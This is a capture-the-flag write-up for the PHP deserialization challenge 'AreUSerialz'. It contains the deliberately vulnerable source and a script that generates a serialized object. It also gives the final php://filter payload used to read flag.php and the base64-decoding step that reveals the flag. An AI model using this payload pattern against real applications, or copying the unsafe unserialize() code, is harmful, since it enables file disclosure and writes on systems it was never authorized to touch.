25.AreUSerialz
<?php
include("flag.php");
// Prints this file's own source to the response: the challenge intentionally discloses its code.
highlight_file(__FILE__);

// Challenge class. Nothing in this file constructs it directly; the only instance is the one
// unserialize() rebuilds from $_GET['str'] at the bottom, so every property value originates
// from the request. unserialize() does not invoke __construct(), but it does arm __destruct().
class FileHandler {
    protected $op;
    protected $filename;
    protected $content;
    function __construct() {
        // NOTE: these assign locals, not $this->op / $this->filename / $this->content,
        // so a normally constructed object starts with all three properties unset.
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }
    // Dispatches on $op with loose (==) comparison: an int 2 in the serialized
    // payload satisfies == "2" just as the string "2" would.
    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }
    // Writes $content to $filename; both come from the unserialized object, i.e. from the
    // request. The only limit is the 100-byte cap on content, nothing constrains the path.
    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            // file_put_contents() returns the byte count, so writing "" yields 0 and reports "Failed!".
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }
    // Reads $filename and returns its contents ("" when unset). file_get_contents() accepts
    // stream wrappers, so the request-controlled name can select e.g. php://filter on flag.php.
    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }
    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }
    // Runs when the unserialized object is released. `op` here is a bare identifier, not
    // $this->op: PHP 7 treats the undefined constant as the string "op" (with a warning) and
    // PHP 8 throws, so the intended reset to "1" never fires. process() then re-runs with
    // whatever $op the request supplied - this is the reachable sink for read()/write().
    function __destruct() {
        if(op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }
}

// Byte allowlist for the raw serialized string: only printable ASCII 32..125 passes
// (NUL, DEL and anything >= 126 are rejected). This is an input-shape check, not a
// deserialization defense - it does not restrict which class or properties are instantiated.
function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

// `$_GET{'str'}` uses the curly-brace offset syntax (deprecated in PHP 7.4, removed in 8.0).
// unserialize() on request data is deserialization of untrusted input; the mitigation is
// json_decode() for data, or at minimum unserialize($str, ['allowed_classes' => false])
// so no application class (and hence no __destruct()) can be instantiated by the client.
if(isset($_GET{'str'})) {
    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }
}
代码审计后发现当参数op为2、str为带过滤的flag文件名作为url参数可以查看flag文件,序列化的代码如下,得到结果后注意序列化为字符串的参数个数和字符串长度,修改后得到url的字符串形式的对象参数
<?php
// Local stand-in for the challenge class, used only to produce the serialized form.
// Visibility and property names mirror the target so the serialized object graph
// matches; `op` is an int, which the target's loose == "2" comparison still accepts.
class FileHandler
{
    protected $op = 2;
    protected $filename = 'php://filter/read=convert.base64-encode/resource=flag.php';
    protected $content;
}

$handler = new FileHandler();
$baimao = serialize($handler);
echo $baimao;

// serialize() emits protected property names as "\0*\0name"; those NUL bytes fall outside
// the target's is_valid() range, which is why the write-up hand-edits the names and lengths
// before submitting. The string actually used as the `str` parameter:
//str=O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";s:7:"content";N;}
?>
进入url后,发现了一堆字符串,不认识,base64解码看看:
import base64

# Base64 text returned by the php://filter read of flag.php (copied from the response body).
str1 = 'PD9waHAgJGZsYWc9J2ZsYWd7OTZjNWJiZTgtZmE1Yy00NTQyLThiNzktM2EzMjcxMTM5N2JkfSc7Cg=='

# Decode back to the original PHP source text and show it.
str_decode = base64.b64decode(str1).decode("utf-8")
print(str_decode)
得到flag